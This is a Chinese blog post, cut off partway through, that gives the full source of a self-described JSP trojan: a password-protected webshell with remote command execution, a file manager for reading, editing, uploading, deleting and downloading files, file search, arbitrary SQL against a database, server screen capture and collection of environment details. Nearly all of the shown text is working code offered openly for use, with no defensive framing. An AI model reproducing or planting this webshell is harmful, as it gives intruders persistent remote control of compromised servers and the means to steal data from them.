漂亮的JSP木马
纯粹手痒,写一个JSP木马。代码如下:
1 <%@ page contentType="text/html; charset=utf-8"%> 2 <%@ page import="java.io.*"%> 3 <%@ page import="java.util.*"%> 4 <%@ page import="java.nio.charset.Charset"%> 5 <%@ page import="java.util.regex.*"%> 6 <%@ page import="java.sql.*"%> 7 <%@ page import="java.util.zip.ZipEntry"%> 8 <%@ page import="java.util.zip.ZipOutputStream"%> 9 <%@ page import="java.text.DecimalFormat"%> 10 <%@ page import="java.net.InetAddress"%> 11 <%@ page import="java.awt.Dimension"%> 12 <%@ page import="java.awt.Toolkit"%> 13 <%@ page import="java.awt.image.BufferedImage"%> 14 <%@ page import="java.awt.Rectangle"%> 15 <%@ page import="java.awt.Robot"%> 16 <%@ page import="javax.imageio.ImageIO"%> 17 <%! 18 /* 19 * Code by Kenn 20 * QQ: 921506 21 */ 22 private String myPassword = "hello"; 23 private String shellName = "Hello Shell"; //title 24 /* 25 * 骷髅标志:\\u2620 星月标志:\\u262a 外星人标志:\\ud83d\\udc7d 26 */ 27 private String loginIcon = "\\u2620"; 28 private int sessionOutTime = 30; //minutes 29 private static String language = "ENG"; //default language: ENG or CHN; 30 private String encodeType = "utf8"; 31 //welcome info of login page 32 public static String welcomeMsg(){ 33 return orChinese("Welcome for coming","你丫又来了"); 34 } 35 36 private enum Operation{Edit,Delete,Rename,Download;} 37 private String curPath; 38 private boolean isDBconnected = false; 39 private Connection conn = null; 40 private Statement dbStatement = null; 41 42 private static Map<String,String> textMap = null; 43 44 static{ 45 initMap(); 46 } 47 48 public static void initMap(){ 49 if (textMap==null){ 50 textMap = new HashMap<String,String>(); 51 textMap.put("Environment", "系统环境"); 52 textMap.put("File Manager", "文件管理"); 53 textMap.put("File Search", "文件搜索"); 54 textMap.put("Command", "命令行"); 55 textMap.put("Database", "数据库"); 56 textMap.put("Screen Capture", "屏幕采集"); 57 textMap.put("Logoff", "退出"); 58 textMap.put("OS", "操作系统"); 59 textMap.put("Computer Name", "计算机名"); 60 textMap.put("Available Processors", "处理器可用核心数"); 
61 textMap.put("IP", "IP地址"); 62 textMap.put("System Driver", "系统盘符"); 63 textMap.put("Driver Info", "磁盘信息"); 64 textMap.put("User Name", "用户名"); 65 textMap.put("User DNS Domain", "用户域"); 66 textMap.put("User Domain", "帐户的域名称"); 67 textMap.put("User Profile", "用户目录"); 68 textMap.put("All User Profile", "用户公共目录"); 69 textMap.put("Temp", "用户临时文件目录"); 70 textMap.put("Program Files", "默认程序目录"); 71 textMap.put("AppData", "应用程序数据目录"); 72 textMap.put("System Root", "系统启动目录"); 73 textMap.put("Console", "控制台"); 74 textMap.put("File Executable", "可执行后缀"); 75 textMap.put("My Path", "本程序绝对路径"); 76 textMap.put("User Dir", "当前用户工作目录"); 77 textMap.put("Protocol", "网络协议"); 78 textMap.put("Server Info", "服务器软件版本信息"); 79 textMap.put("JDK Version", "JDK版本"); 80 textMap.put("JDK Home", "JDK安装路径"); 81 textMap.put("JVM Version", "JAVA虚拟机版本"); 82 textMap.put("JVM Name", "JAVA虚拟机名"); 83 textMap.put("Class Path", "JAVA类路径"); 84 textMap.put("Java Library Path", "JAVA载入库搜索路径"); 85 textMap.put("Java tmpdir", "JAVA临时目录"); 86 textMap.put("Compiler", "JIT编译器名"); 87 textMap.put("Java ext dirs", "扩展目录路径"); 88 textMap.put("Remote Addr", "客户机地址"); 89 textMap.put("Remote Host", "客户机器名"); 90 textMap.put("Remote User", "客户机用户名"); 91 textMap.put("Scheme", "请求方式"); 92 textMap.put("Secure", "应用安全套接字层"); 93 textMap.put("Yes", "是"); 94 textMap.put("No", "否"); 95 textMap.put("Edit", "编辑"); 96 textMap.put("Delete", "删除"); 97 textMap.put("Rename", "重命名"); 98 textMap.put("Download", "下载"); 99 textMap.put("File Name", "文件名"); 100 textMap.put("Size", "大小"); 101 textMap.put("Operation", "操作"); 102 textMap.put("GOTO", "跳转"); 103 textMap.put("Home", "家目录"); 104 textMap.put("Select", "选择"); 105 textMap.put("Upload", "上传"); 106 textMap.put("Create File", "创建文件"); 107 textMap.put("Create Folder", "创建文件夹"); 108 textMap.put("Wrong Password","密码错误"); 109 textMap.put("Folder name is null","文件夹名为空"); 110 textMap.put("Content is null","内容为空"); 111 textMap.put("File name is null","文件名为空"); 112 textMap.put("Search 
from","搜索目录"); 113 textMap.put("Search for file type","文件的后缀名"); 114 textMap.put("Setting","设置"); 115 textMap.put("Search by Name","按名称搜索"); 116 textMap.put("Search by Content","按内容搜索"); 117 textMap.put("Ignore Case","忽略大小写"); 118 textMap.put("Search keyword","关键词"); 119 textMap.put("Search","搜索"); 120 textMap.put("Execute","执行"); 121 textMap.put("Connect","连接"); 122 textMap.put("Disconnect","断开"); 123 textMap.put("Database Type","数据库类型"); 124 textMap.put("Driver","驱动程序"); 125 textMap.put("Host","主机地址"); 126 textMap.put("Port","端口号"); 127 textMap.put("DB Name","数据库名"); 128 textMap.put("Username","用户名"); 129 textMap.put("Password","密码"); 130 textMap.put("SQL","SQL语句"); 131 textMap.put("File is already exist","文件已存在"); 132 textMap.put("Folder is empty","文件夹为空"); 133 textMap.put("Bad command","错误的命令"); 134 textMap.put("Save","保存"); 135 textMap.put("Return Back","返回"); 136 textMap.put("is not a text file","不是文本文件"); 137 textMap.put("File can not be writed","文件不可写"); 138 textMap.put("Save success","保存成功"); 139 textMap.put("Exception","异常"); 140 textMap.put("Folder already exist","文件夹已存在"); 141 textMap.put("File already exist","文件已存在"); 142 textMap.put("File upload success","文件上传成功"); 143 textMap.put("File upload failed","文件上传失败"); 144 textMap.put("connect failed","连接失败"); 145 textMap.put("connect success","连接成功"); 146 textMap.put("Can not connect to database","不能连接到数据库"); 147 textMap.put("Invalid SQL","无效的SQL"); 148 textMap.put("result","结果"); 149 textMap.put("SQL execute failed","SQL执行失败"); 150 textMap.put("SQL execute success","SQL执行成功"); 151 textMap.put("Free, Total","可用,共"); 152 textMap.put("Please input new name","请输入新的名字"); 153 textMap.put("Name can not be null","名字不可为空"); 154 textMap.put("Refresh","刷新"); 155 } 156 } 157 public static String orChinese(String key){ 158 return "CHN".equalsIgnoreCase(language) 159 ? 
textMap.get(key) 160 : key; 161 } 162 public static String orChinese(String english, String chinese){ 163 textMap.put(english, chinese); 164 return orChinese(english); 165 } 166 public List<File> getFolderList(String path) { 167 List<File> rtnList = new ArrayList<File>(); 168 File file = new File(path); 169 if (file.exists() && file.isDirectory()) { 170 File[] listFiles = file.listFiles(new FileFilter() { 171 public boolean accept(File pathname) { 172 return pathname.isDirectory(); 173 } 174 }); 175 rtnList.addAll(Arrays.asList(listFiles)); 176 } 177 return rtnList; 178 } 179 180 public List<File> getFileList(String path) { 181 List<File> rtnList = new ArrayList<File>(); 182 File file = new File(path); 183 if (file.exists() && file.isDirectory()) { 184 File[] listFiles = file.listFiles(new FileFilter() { 185 public boolean accept(File pathname) { 186 return pathname.isFile(); 187 } 188 }); 189 rtnList.addAll(Arrays.asList(listFiles)); 190 } 191 return rtnList; 192 } 193 194 public class MyFile extends File { 195 196 private String htmlOperation; 197 private String requestUrl; 198 199 public MyFile(String pathname, String requestUrl) { 200 super(pathname); 201 this.requestUrl = requestUrl; 202 } 203 204 public String getHtmlOperation() { 205 return htmlOperation; 206 } 207 208 public void setHtmlOperation(Operation... 
Opers) { 209 this.htmlOperation = ""; 210 for (Operation o : Opers) { 211 if (o.equals(Operation.Rename)) { 212 String url = requestUrl + "&fsAction=" + o + "&fileName=" + this.getName(); 213 htmlOperation += " <a href=\\"#\\" onclick=\\"rename(‘" + url + "‘,‘" 214 + orChinese("Please input new name") + "‘,‘" + orChinese("Name can not be null") + "‘)\\">" 215 + orChinese(o.toString()) + "</a> "; 216 } else { 217 htmlOperation += " <a href=\\"" + requestUrl + "&fsAction=" + o + "&fileName=" + this.getName() 218 + "\\">" + orChinese(o.toString()) + "</a> "; 219 } 220 } 221 } 222 223 public String getLength() { 224 if (this.isDirectory()) 225 return ""; 226 return getSize(this.length()); 227 } 228 } 229 230 public static String getSize(long size) { 231 DecimalFormat df = new DecimalFormat("0.00"); 232 if (size >> 40 >= 1) 233 return df.format((float) size / 1024 / 1024 / 1024 / 1024) + " TB"; 234 if (size >> 30 >= 1) 235 return df.format((float) size / 1024 / 1024 / 1024) + " GB"; 236 else if (size >> 20 >= 1) 237 return df.format((float) size / 1024 / 1024) + " MB"; 238 else if (size >> 10 >= 1) 239 return df.format((float) size / 1024) + " KB"; 240 else 241 return df.format((float) size) + " B "; 242 } 243 244 public void download(String path, HttpServletResponse response) throws Exception { 245 try { 246 File file = new File(path); 247 String filename = file.getName(); 248 String ext = filename.substring(filename.lastIndexOf(".") + 1).toUpperCase(); 249 InputStream fis = new BufferedInputStream(new FileInputStream(path)); 250 byte[] buffer = new byte[fis.available()]; 251 fis.read(buffer); 252 fis.close(); 253 response.reset(); 254 response.addHeader("Content-Disposition", 255 "attachment;filename=" + new String(filename.getBytes(), "ISO-8859-1")); 256 response.addHeader("Content-Length", "" + file.length()); 257 OutputStream toClient = new BufferedOutputStream(response.getOutputStream()); 258 response.setContentType("application/octet-stream"); 259 
toClient.write(buffer); 260 toClient.flush(); 261 toClient.close(); 262 } catch (IOException ex) { 263 throw ex; 264 } 265 } 266 267 public static File createZip(String sourcePath, String zipPath) throws Exception { 268 FileOutputStream fos = null; 269 ZipOutputStream zos = null; 270 try { 271 File zipFile = new File(zipPath); 272 if (zipFile.exists()) { 273 throw new Exception(orChinese("File is already exist") + ": " + zipFile.getName()); 274 } 275 File srcFolder = new File(sourcePath); 276 if (!srcFolder.exists() || srcFolder.listFiles().length == 0) { 277 throw new Exception(orChinese("Folder is empty") + ": " + srcFolder.getName()); 278 } 279 fos = new FileOutputStream(zipPath); 280 zos = new ZipOutputStream(fos); 281 writeZip(new File(sourcePath), "", zos); 282 return zipFile; 283 } catch (Exception e) { 284 throw e; 285 } finally { 286 try { 287 if (zos != null) 288 zos.close(); 289 if (fos != null) 290 fos.close(); 291 } catch (Exception e) { 292 throw e; 293 } 294 } 295 } 296 297 private static void writeZip(File file, String parentPath, ZipOutputStream zos) throws Exception { 298 if (!file.exists()) 299 return; 300 if (file.isDirectory()) { 301 parentPath += file.getName() + File.separator; 302 File[] files = file.listFiles(); 303 for (File f : files) { 304 writeZip(f, parentPath, zos); 305 } 306 } else { 307 FileInputStream fis = null; 308 DataInputStream dis = null; 309 try { 310 fis = new FileInputStream(file); 311 dis = new DataInputStream(new BufferedInputStream(fis)); 312 ZipEntry ze = new ZipEntry(parentPath + file.getName()); 313 zos.putNextEntry(ze); 314 byte[] content = new byte[1024]; 315 int len; 316 while ((len = fis.read(content)) != -1) { 317 zos.write(content, 0, len); 318 zos.flush(); 319 } 320 } catch (Exception e) { 321 throw e; 322 } finally { 323 try { 324 if (dis != null) 325 dis.close(); 326 if (fis != null) 327 fis.close(); 328 } catch (Exception e) { 329 throw e; 330 } 331 } 332 } 333 } 334 335 public String exeCmd(String cmd) { 
336 Runtime runtime = Runtime.getRuntime(); 337 Process proc = null; 338 String retStr = ""; 339 InputStreamReader insReader = null; 340 char[] tmpBuffer = new char[1024]; 341 int nRet = 0; 342 343 try { 344 proc = runtime.exec(cmd); 345 insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); 346 347 while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { 348 retStr += new String(tmpBuffer, 0, nRet) + "\\n"; 349 } 350 insReader.close(); 351 retStr = HTMLEncode(retStr); 352 return retStr; 353 } catch (Exception e) { 354 retStr = "<font color=\\"red\\">" + orChinese("Bad command") + ": \\"" + cmd + "\\"</font>"; 355 return retStr; 356 } 357 } 358 359 public String HTMLEncode(String str) { 360 str = str.replaceAll(" ", " "); 361 str = str.replaceAll("<", "<"); 362 str = str.replaceAll(">", ">"); 363 str = str.replaceAll("\\r\\n", "<br>"); 364 return str; 365 } 366 367 public String Unicode2GB(String str) { 368 String sRet = null; 369 if (str == null) 370 return ""; 371 try { 372 sRet = new String(str.getBytes("ISO8859_1"), encodeType); 373 } catch (Exception e) { 374 sRet = str; 375 } 376 377 return sRet; 378 } 379 380 public String pathConvert(String path) { 381 String sRet = path.replace(‘\\\\‘, ‘/‘); 382 File file = new File(path); 383 if (file.getParent() != null) { 384 if (file.isDirectory()) { 385 if (!sRet.endsWith("/")) 386 sRet += "/"; 387 } 388 } else { 389 if (!sRet.endsWith("/")) 390 sRet += "/"; 391 } 392 return sRet; 393 } 394 395 public String searchFile(String path, String content, String subfix, boolean byname, boolean ignoreCase) { 396 List<String> list = new ArrayList<String>(); 397 searchFile(list, path, content, subfix, byname, ignoreCase); 398 StringBuilder sb = new StringBuilder(); 399 for (String line : list) { 400 sb.append(line.replace("\\\\", "/") + "<br>"); 401 } 402 return sb.toString(); 403 } 404 405 private void searchFile(List<String> list, String path, String content, String subfix, boolean byname, 406 
boolean ignoreCase) { 407 path = pathConvert(path); 408 File dir = new File(path); 409 if (dir.exists() && dir.isDirectory()) { 410 if (dir.list() != null && dir.list().length > 0) { 411 for (File f : dir.listFiles()) { 412 if (!f.isDirectory()) { 413 String fname = f.getName(); 414 String srcStr = f.getName(); 415 if (containsSubfix(fname, subfix.split(" "))) { 416 if (!byname) { 417 srcStr = readText(f); 418 } 419 if (ignoreCase) { 420 content = content.toUpperCase(); 421 srcStr = srcStr.toUpperCase(); 422 } 423 if (srcStr.contains(content)) { 424 list.add(f.getAbsolutePath()); 425 } 426 } 427 } else { 428 searchFile(list, f.getAbsolutePath(), content, subfix, byname, ignoreCase); 429 } 430 } 431 } 432 } 433 } 434 435 private boolean containsSubfix(String name, String[] subfixs) { 436 boolean rtn = false; 437 if (subfixs == null || subfixs.length == 0) 438 return rtn; 439 for (String ext : subfixs) { 440 if (name.toUpperCase().endsWith(ext.toUpperCase())) { 441 rtn = true; 442 } 443 } 444 return rtn; 445 } 446 447 public static String readText(File file) { 448 StringBuilder sb = new StringBuilder(); 449 BufferedReader reader = null; 450 try { 451 reader = new BufferedReader(new InputStreamReader(new FileInputStream(file), "GB2312")); 452 String str = null; 453 while ((str = reader.readLine()) != null) { 454 sb.append(str); 455 } 456 } catch (Exception e) { 457 e.printStackTrace(); 458 } finally { 459 try { 460 reader.close(); 461 } catch (Exception e) { 462 e.printStackTrace(); 463 } 464 } 465 return sb.toString(); 466 467 } 468 469 public String openFile(String path, String fileName, String curUri) { 470 String sRet = ""; 471 String fileString = null; 472 File curFile = null; 473 path = pathConvert(path); 474 try { 475 fileString = ""; 476 curFile = new File(path, fileName); 477 FileReader fileReader = new FileReader(curFile); 478 char[] chBuffer = new char[1024]; 479 int nRet; 480 while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { 481 fileString += new 
String(chBuffer, 0, nRet); 482 } 483 if (fileString != null) { 484 sRet += "<table align=\\"center\\" width=\\"100%\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n"; 485 sRet += " <form name=\\"openfile\\" method=\\"post\\" action=\\"" + curUri + "&curPath=" + path 486 + "&fsAction=save" + "\\">\\n"; 487 sRet += " <input type=\\"hidden\\" name=\\"fileName\\" value=\\"" + fileName + "\\" />\\n"; 488 sRet += " <tr>\\n"; 489 sRet += " <td>[<a href=\\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\\">" 490 + orChinese("Return Back") + "</a>]</td>\\n"; 491 sRet += " </tr>\\n"; 492 sRet += " <tr>\\n"; 493 sRet += " <td align=\\"left\\">\\n"; 494 sRet += " <textarea name=\\"fileContent\\" class=\\"trans\\" style=\\"display:block;width:100%\\" rows=\\"32\\" >\\n"; 495 sRet += HTMLEncode(fileString).replace("<br>", "\\r\\n"); 496 sRet += " </textarea>\\n"; 497 sRet += " </td>\\n"; 498 sRet += " </tr>\\n"; 499 sRet += " <tr>\\n"; 500 sRet += " <td align=\\"center\\"><input type=\\"submit\\" class=\\"trans\\" value=\\"" 501 + orChinese("Save") + "\\" /></td>\\n"; 502 sRet += " </tr>\\n"; 503 sRet += " </form>\\n"; 504 sRet += "</table>\\n"; 505 } 506 fileReader.close(); 507 } catch (IOException e) { 508 sRet = "<font color=\\"red\\">\\"" + path + "\\" " + orChinese("is not a text file") + "</font>"; 509 } 510 return sRet; 511 } 512 513 public String saveFile(String path, String fileName, String curUri, String fileContent) { 514 String sRet = ""; 515 File file = null; 516 517 path = pathConvert(path); 518 519 try { 520 file = new File(path, fileName); 521 522 if (!file.canWrite()) { 523 sRet = "<font color=\\"red\\">" + orChinese("File can not be writed") + "</font>"; 524 } else { 525 FileWriter fileWriter = new FileWriter(file); 526 fileWriter.write(fileContent); 527 528 fileWriter.close(); 529 sRet = orChinese("Save success") + "!\\n"; 530 sRet += "<meta http-equiv=\\"refresh\\" content=\\"1;url=" + curUri + "&curPath=" + path 531 + "&fsAction=list\\" />\\n"; 
532 } 533 } catch (IOException e) { 534 sRet = "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>"; 535 } 536 return sRet; 537 } 538 539 public String createFolder(String path, String fileName, String url) { 540 try { 541 File file = new File(path, fileName); 542 if (file.exists()) 543 return orChinese("Folder already exist") + "!"; 544 else 545 file.mkdirs(); 546 } catch (Exception e) { 547 return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>"; 548 } 549 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 550 } 551 552 public String createFile(String path, String fileName, String url) { 553 try { 554 File file = new File(path, fileName); 555 if (file.exists()) 556 return orChinese("File already exist") + "!"; 557 else 558 file.createNewFile(); 559 } catch (Exception e) { 560 return "<font color=\\"red\\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>"; 561 } 562 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 563 } 564 565 public String deleteFile(String path, String fileName, String url) { 566 File file = new File(path, fileName); 567 if (file.exists()) 568 file.delete(); 569 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 570 } 571 572 public String download(String path, String fileName, String url, HttpServletResponse response) { 573 String rtnStr = ""; 574 File file = new File(path, fileName); 575 File downFile = null; 576 if (!file.exists()) 577 return null; 578 try { 579 if (file.isDirectory()) { 580 file = createZip(file.getAbsolutePath(), file.getAbsolutePath() + ".zip"); 581 } 582 download(file.getAbsolutePath(), response); 583 } catch (Exception e) { 584 rtnStr = e.getMessage(); 585 } 586 return rtnStr; 587 } 588 589 public String rename(String path, String fileName, String newFile, 
String url) { 590 File file = new File(path, fileName); 591 File nFile = new File(path, newFile); 592 if (file.exists()) { 593 file.renameTo(nFile); 594 } 595 return "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + url + "&curPath=" + path + "&fsAction=list\\" />"; 596 } 597 598 public String uploadFile(ServletRequest request, String path, String curUri) { 599 String sRet = ""; 600 File file = null; 601 InputStream in = null; 602 path = pathConvert(path); 603 try { 604 in = request.getInputStream(); 605 byte[] inBytes = new byte[request.getContentLength()]; 606 int nBytes; 607 int start = 0; 608 int end = 0; 609 int size = 1024; 610 String token = null; 611 String filePath = null; 612 while ((nBytes = in.read(inBytes, start, size)) != -1) { 613 start += nBytes; 614 } 615 in.close(); 616 int i = 0; 617 byte[] seperator; 618 619 while (inBytes[i] != 13) { 620 i++; 621 } 622 seperator = new byte[i]; 623 624 for (i = 0; i < seperator.length; i++) { 625 seperator[i] = inBytes[i]; 626 } 627 String dataHeader = null; 628 i += 3; 629 start = i; 630 while (!(inBytes[i] == 13 && inBytes[i + 2] == 13)) { 631 i++; 632 } 633 end = i - 1; 634 dataHeader = new String(inBytes, start, end - start + 1); 635 token = "filename=\\""; 636 start = dataHeader.indexOf(token) + token.length(); 637 token = "\\""; 638 end = dataHeader.indexOf(token, start) - 1; 639 filePath = dataHeader.substring(start, end + 1); 640 i += 4; 641 start = i; 642 end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; 643 File newFile = new File(path + filePath); 644 newFile.createNewFile(); 645 FileOutputStream out = new FileOutputStream(newFile); 646 out.write(inBytes, start, end - start + 1); 647 out.close(); 648 649 sRet = "<script language=\\"javascript\\">\\n"; 650 sRet += "alert(\\"" + orChinese("File upload success") + "! 
" + filePath + "\\");\\n"; 651 sRet += "</script>\\n"; 652 } catch (IOException e) { 653 sRet = "<script language=\\"javascript\\">\\n"; 654 sRet += "alert(\\"" + orChinese("File upload failed") + "!\\");\\n"; 655 sRet += "</script>\\n"; 656 } 657 658 sRet += "<meta http-equiv=\\"refresh\\" content=\\"0;url=" + curUri + "&curPath=" + path + "\\" />"; 659 return sRet; 660 } 661 662 public String DBConnect(String url, String username, String password) { 663 String bRet = orChinese("connect failed"); 664 if (url != null) { 665 try { 666 if (username != null && username.trim().length() > 0) { 667 conn = DriverManager.getConnection(url, username, password); 668 } else { 669 conn = DriverManager.getConnection(url); 670 } 671 dbStatement = conn.createStatement(); 672 bRet = orChinese("connect success"); 673 } catch (SQLException e) { 674 bRet = orChinese("connect failed") + ": " + e.getMessage(); 675 } 676 } 677 return bRet; 678 } 679 680 public String DBExecute(String sql) { 681 String sRet = ""; 682 if (sql == null) 683 return "SQL is null"; 684 if (conn == null || dbStatement == null) { 685 sRet = "<font color=\\"red\\">" + orChinese("Can not connect to database") + "</font>"; 686 } else { 687 try { 688 if (sql.length() <= 6) 689 return "<font color=\\"red\\">" + orChinese("Invalid SQL") + "</font>"; 690 if (sql.toLowerCase().substring(0, 6).equals("select")) { 691 ResultSet rs = dbStatement.executeQuery(sql); 692 ResultSetMetaData rsmd = rs.getMetaData(); 693 int colNum = rsmd.getColumnCount(); 694 int colType; 695 696 sRet = orChinese("SQL execute success") + ", " + orChinese("result") + ":<br>\\n"; 697 sRet += "<table align=\\"center\\" border=\\"0\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n"; 698 sRet += " <tr>\\n"; 699 for (int i = 1; i <= colNum; i++) { 700 sRet += " <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\\n"; 701 } 702 sRet += " </tr>\\n"; 703 while (rs.next()) { 704 sRet += " <tr>\\n"; 705 for (int i = 1; i <= colNum; i++) 
{ 706 colType = rsmd.getColumnType(i); 707 708 sRet += " <td>"; 709 switch (colType) { 710 case Types.BIGINT: 711 sRet += rs.getLong(i); 712 break; 713 714 case Types.BIT: 715 sRet += rs.getBoolean(i); 716 break; 717 718 case Types.BOOLEAN: 719 sRet += rs.getBoolean(i); 720 break; 721 722 case Types.CHAR: 723 sRet += rs.getString(i); 724 break; 725 726 case Types.DATE: 727 sRet += rs.getDate(i).toString(); 728 break; 729 730 case Types.DECIMAL: 731 sRet += rs.getDouble(i); 732 break; 733 734 case Types.NUMERIC: 735 sRet += rs.getDouble(i); 736 break; 737 738 case Types.REAL: 739 sRet += rs.getDouble(i); 740 break; 741 742 case Types.DOUBLE: 743 sRet += rs.getDouble(i); 744 break; 745 746 case Types.FLOAT: 747 sRet += rs.getFloat(i); 748 break; 749 750 case Types.INTEGER: 751 sRet += rs.getInt(i); 752 break; 753 754 case Types.TINYINT: 755 sRet += rs.getShort(i); 756 break; 757 758 case Types.VARCHAR: 759 sRet += rs.getString(i); 760 break; 761 762 case Types.TIME: 763 sRet += rs.getTime(i).toString(); 764 break; 765 766 case Types.DATALINK: 767 sRet += rs.getTimestamp(i).toString(); 768 break; 769 } 770 sRet += " </td>\\n"; 771 } 772 sRet += " </tr>\\n"; 773 } 774 sRet += "</table>\\n"; 775 776 rs.close(); 777 } else { 778 if (dbStatement.execute(sql)) { 779 sRet = orChinese("SQL execute success"); 780 } else { 781 sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>"; 782 } 783 } 784 } catch (SQLException e) { 785 sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>"; 786 } 787 } 788 789 return sRet; 790 } 791 792 private void getScreenImg(HttpServletRequest request, HttpServletResponse response) throws Exception { 793 try{ 794 response.reset(); 795 response.setContentType("image/jpg"); 796 ServletOutputStream sos = response.getOutputStream(); 797 response.setHeader("Pragma", "No-cache"); 798 response.setHeader("Cache-Control", "no-cache"); 799 response.setDateHeader("Expires", 0); 800 Dimension dimension = 
Toolkit.getDefaultToolkit().getScreenSize(); 801 BufferedImage screenshot = (new Robot()) 802 .createScreenCapture(new Rectangle(0, 0, (int) dimension.getWidth(), (int) dimension.getHeight())); 803 ByteArrayOutputStream bos = new ByteArrayOutputStream(); 804 ImageIO.write(screenshot, "jpg", bos); 805 byte[] buf = bos.toByteArray(); 806 response.setContentLength(buf.length); 807 sos.write(buf); 808 bos.close(); 809 sos.close(); 810 }catch(Exception e){ 811 } 812 } 813 814 public String getDriverInfo() { 815 String str = ""; 816 File[] roots = File.listRoots(); 817 for (File file : roots) { 818 str += file.getPath() + " ("; 819 str += getSize(file.getFreeSpace()) + " " + orChinese("Free, Total") + " "; 820 str += getSize(file.getTotalSpace()) + ")<br>"; 821 } 822 return str; 823 }%> 824 825 <html> 826 <head> 827 <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 828 <style> 829 body {font-size: 14px;font-family: 宋 体 ;color: white;background-color: black;text-align: center;padding: 5 5 5 5;} 830 .trans {background: transparent;margin: 1 1 1 1;color: white;} 831 input.textbox {border: black solid 1;font-size: 12px;height: 18px;} 832 textarea {border: black solid 1;} 833 table {border-collapse: collapse;} 834 table.onhover tr:hover{background:red;} 835 td {border: 1px dotted #FFF;height: 18px;} 836 .break-all {word-break: break-all;} 837 .oper {display: inline-block;float: left;width: 130px;border: 1px dotted #FFF;padding: 5px;margin-right: 3px;margin-bottom: 15px;height: 18px;cursor: hand;} 838 .container {position: absolute;margin: 2 2 2 2;top: 68px;width: 95%;} 839 a:link, a:visited {text-decoration: none;color: #FFF;} 840 a:hover {text-decoration: underline;color: #FFF;} 841 842 </style> 843 <script type="text/JavaScript"> 844 var pressKey = function() { 845 if (event.keyCode == 13) { 846 event.returnValue = false; 847 event.cancel = true; 848 loginForm.submit(); 849 } 850 } 851 var redirect = function(action) { 852 var actionOption = 
document.getElementById(‘actionOption‘); 853 actionOption.value = action; 854 actionForm.submit(); 855 } 856 var createFile = function(url){ 857 var filename = document.getElementById(‘createFileName‘); 858 window.location.href = url + "&fileName=" + filename.value; 859 } 860 var rename = function(url, msg, errormsg){ 861 var result = prompt(msg + ":" ,"") 862 if (result){ 863 window.location.href=url + "&newName=" + result; 864 }else{ 865 alert(errormsg); 866 } 867 } 868 var dbsubmit = function(fsAction){ 869 var form = document.getElementById("sqlform"); 870 form.action += "&fsAction=" + fsAction; 871 document.getElementById("sqlform").submit(); 872 } 873 var languageChanged = function(url , oldurl){ 874 oldurl = oldurl.replace("&","{{and}}").replace("?","{{question}}"); 875 url = url + "&oldurl=" + oldurl; 876 window.location.href = url; 877 } 878 </script> 879 <title><%=shellName %></title> 880 </head> 881 <body> 882 <% 883 session.setMaxInactiveInterval(sessionOutTime * 60); 884 if (request.getParameter("myPassword") == null && session.getAttribute("myPassword") == null) { 885 if (request.getParameter("lang") !=null){ 886 language = request.getParameter("lang"); 887 String oldurl = request.getParameter("oldurl"); 888 String str = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />"; 889 out.println(str); 890 out.flush(); 891 } 892 %> 893 <font style="font-size: 300px; color: white"><% out.println(loginIcon); %></font> 894 <form name="loginForm"> 895 <font size=4><%=welcomeMsg() %></font><br><br> 896 <input class="textbox" size="30" name="myPassword" type="password" onkeydown="pressKey()" /> 897 </form> 898 <% 899 } else { 900 String password = null; 901 if (session.getAttribute("myPassword") == null) { 902 password = (String) request.getParameter("myPassword"); 903 if (!myPassword.equals(password)) { 904 String rtnStr = "<div align=\\"center\\"><br><br><font color=\\"red\\">"+orChinese("Wrong Password")+"</font></div>"; 905 rtnStr += "<meta 
http-equiv=\\"refresh\\" content=\\"1;url=" + request.getRequestURL() + "\\" />"; 906 out.println(rtnStr); 907 out.flush(); 908 //out.close(); 909 return; 910 } 911 session.setAttribute("myPassword", password); 912 } else { 913 password = (String) session.getAttribute("myPassword"); 914 } 915 916 String action = null; 917 if (request.getParameter("action") == null) 918 action = "env"; 919 else 920 action = (String) request.getParameter("action"); 921 922 if (action.equals("exit")) { 923 session.removeAttribute("myPassword"); 924 response.sendRedirect(request.getRequestURI()); 925 //out.close(); 926 return; 927 } 928 %> 929 <form name="actionForm"> 930 <input id="actionOption" type="hidden" name="action" value="Environment" /> 931 </form> 932 <div style="margin-left: 2px"> 933 <div class="oper" onclick="redirect(‘env‘)"><%=orChinese("Environment")%></div> 934 <div class="oper" onclick="redirect(‘file‘)" id="file_system"><%=orChinese("File Manager")%></div> 935 <div class="oper" onclick="redirect(‘search‘)"><%=orChinese("File Search")%></div> 936 <div class="oper" onclick="redirect(‘command‘)"><%=orChinese("Command")%></div> 937 <div class="oper" onclick="redirect(‘database‘)"><%=orChinese("Database")%></div> 938 <div class="oper" onclick="redirect(‘screen‘)"><%=orChinese("Screen Capture")%></div> 939 <div class="oper" onclick="redirect(‘exit‘)"><%=orChinese("Logoff")%></div> 940 </div> 941 <% if (action.equals("lang")){ 942 language = request.getParameter("lang"); 943 String oldurl = request.getParameter("oldurl"); 944 if (oldurl!= null){ 945 oldurl = oldurl.replace("{{and}}", "&").replace("{{question}}", "?"); 946 } 947 String sRet = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />"; 948 %> 949 <div class="container break-all"><%=sRet %></div> 950 <% 951 }else if (action.equals("env")) { 952 %> 953 <table class="container break-all onhover"> 954 <tr> 955 <td width="20%"><%=orChinese("OS") %></td> 956 <td width="80%"><%=System.getProperty("os.name") 
